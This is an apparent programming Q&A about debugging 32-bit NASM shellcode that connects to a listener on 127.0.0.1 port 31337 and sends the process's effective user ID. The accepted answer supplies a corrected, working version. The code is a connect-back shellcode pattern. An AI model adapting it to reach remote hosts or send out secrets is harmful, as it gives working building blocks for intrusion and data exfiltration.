# nasm x86: send system call interpreting payload to send as NULL

Tags: x86, nasm, system-calls, send

I am attempting to write some shell code which will connect to a listener on port 31337 on localhost and send the effective user id of the program for learning purposes.

To make debugging easier, I constructed the following code and assembled with nasm:

```
BITS 32

section .data

section .bss

section .text
    global _start:

_start:

    ; s = socket(2, 1, 0)
    push BYTE 0x66 ; socketcall is syscall #102 (0x66).
    pop eax
    cdq ; Zero out edx for use as a null DWORD later.
    xor ebx, ebx ; ebx is the type of socketcall.
    inc ebx ; 1 = SYS_SOCKET = socket()
    push edx ; Build arg array: { protocol = 0,
    push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
    push BYTE 0x2 ; AF_INET = 2 }
    mov ecx, esp ; ecx = ptr to argument array
    int 0x80 ; After syscall, eax has socket file descriptor.
    xchg esi, eax ; Save socket FD in esi for later.

    ; connect(s, [2, 31337, <IP address>], 16)
    push BYTE 0x66 ; socketcall (syscall #102)
    pop eax
    inc ebx ; ebx = 2 (needed for AF_INET)
    push DWORD 0x0100007f ; Build sockaddr struct: IP address = 127.0.0.1
    push WORD 0x697a ; (in reverse order) PORT = 31337
    push WORD bx ; AF_INET = 2
    mov ecx, esp ; ecx = server struct pointer
    push BYTE 16 ; argv: { sizeof(server struct) = 16,
    push ecx ; server struct pointer,
    push esi ; socket file descriptor }
    mov ecx, esp ; ecx = argument array
    inc ebx ; ebx = 3 = SYS_CONNECT = connect()
    int 0x80

    ; geteuid(void)
    push BYTE 0x31 ; call for geteuid (syscall #49)
    pop eax
    int 0x80 ; eax = effective user id
    mov edi, eax ; store euid for later

    ; send(3, euid, 8, 0)
    push BYTE 0x66 ; socketcall (syscall #102)
    pop eax
    xor edx, edx ; creating zero for flags
    push edx 
    push BYTE 8 ; size of data to transmit
    push edi ; euid
    push esi ; file descriptor
    mov ebx, 9 ; ebx = 9 = SYS_SEND = send()
    mov ecx, esp ; argument array
    int 0x80

    ; exit(1)       
    push BYTE 1 ; call for exit
    pop eax
    xor ebx, ebx
    int 0x80
```

When I run this code, a socket is successfully created and a connection is established to a server I have listening on port 31337. However, my user ID is not sent. When I ran strace, I received the following output:

```
execve("./connect_back", ["./connect_back"], [/* 18 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(31337), 
sin_addr=inet_addr("127.0.0.1")}, 16) = 0
geteuid()                               = 0
send(3, NULL, 8, 0)                     = -1 EFAULT (Bad address)
_exit(0)                                = ?
+++ exited with 0 +++
```

It appears that my euid is not being used as an argument. However, when I run gdb on the binary, the program appears to correctly set up the arguments for the send call:

[image: gdb debug]

I am new to nasm so I apologize if this is a silly syntax problem. Thank you for your help!

Comment: Good observation and silly mistake on my part! I ran strace as root which yielded the NULL.  Re-running the strace as a low privilege user cleared the NULL and my 0x3e8 was then present, but it did not resolve the bad address problem.

Comment: @Hosty: of course not, as Michael said, `socketcall` takes its args in memory, and the 2nd args is a *pointer* to the buffer, not the buffer itself.  (Strange that the `send(2)` man page doesn't mention that the kernel interface is a generic `socketcall` system call; most system calls do mention library / kernel differences.  My earlier comment (looking at ECX for the pointer) was based on that misunderstanding that `send` was a plain system call with ebx=fd, ecx=buf, etc.

Comment: Understood, thank you!

Answer (score 2, accepted):

**TL;DR**: The value NULL you see in STRACE for `send` is because you are running STRACE as `root` user and the UID for `root` on Linux distros is generally 0. In the debugger you see 0x3e8 because you ran the debugger as the unprivileged user with UID=1000 (which is 0x3e8).

`sys_send` requires a pointer to data to send, not data. The value 0x0000 and 0x03e8 are being treated as memory addresses even though they are not memory addresses. Both addresses are to memory we don't have read privileges for, thus the result is a *-EFAULT* (bad address) in the `strace` output for `send`

---

You are passing the value of UID to `send`, not a pointer to the data. `send` takes a pointer to data, not the data itself. This code pushes UID on the stack and then uses the stack address as the pointer to the UID. That pointer to the UID is used to call `send`:

```
BITS 32

section .data

section .bss

section .text
    global _start:

_start:

    ; s = socket(2, 1, 0)
    push BYTE 0x66 ; socketcall is syscall #102 (0x66).
    pop eax
    cdq ; Zero out edx for use as a null DWORD later.
    xor ebx, ebx ; ebx is the type of socketcall.
    inc ebx ; 1 = SYS_SOCKET = socket()
    push edx ; Build arg array: { protocol = 0,
    push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
    push BYTE 0x2 ; AF_INET = 2 }
    mov ecx, esp ; ecx = ptr to argument array
    int 0x80 ; After syscall, eax has socket file descriptor.
    xchg esi, eax ; Save socket FD in esi for later.

    ; connect(s, [2, 31337, <IP address>], 16)
    push BYTE 0x66 ; socketcall (syscall #102)
    pop eax
    inc ebx ; ebx = 2 (needed for AF_INET)
    push DWORD 0x0100007f ; Build sockaddr struct: IP address = 127.0.0.1
    push WORD 0x697a ; (in reverse order) PORT = 31337
    push WORD bx ; AF_INET = 2
    mov ecx, esp ; ecx = server struct pointer
    push BYTE 16 ; argv: { sizeof(server struct) = 16,
    push ecx ; server struct pointer,
    push esi ; socket file descriptor }
    mov ecx, esp ; ecx = argument array
    inc ebx ; ebx = 3 = SYS_CONNECT = connect()
    int 0x80

    ; geteuid(void)
    push BYTE 0x31 ; call for geteuid (syscall #49)
    pop eax
    int 0x80 ; eax = effective user id
    push eax     ; Put EAX on the stack
    mov edi, esp ; Get the address (on stack) of the UID

    ; send(3, euid, 8, 0)
    push BYTE 0x66 ; socketcall (syscall #102)
    pop eax
    xor edx, edx ; creating zero for flags
    push edx
    push BYTE 4 ; size of data to transmit
    push edi ; euid
    push esi ; file descriptor
    mov ebx, 9 ; ebx = 9 = SYS_SEND = send()
    mov ecx, esp ; argument array
    int 0x80

    ; exit(1)
    push BYTE 1 ; call for exit
    pop eax
    xor ebx, ebx
    int 0x80
```

I send 4 bytes of data (32-bit integer) rather than 8 bytes. The receiver should receive exactly 4 bytes containing the binary value of the UID.

If you want to send the UID as a printable string then you would have to convert the UID to a string and pass the address of the string to `send`.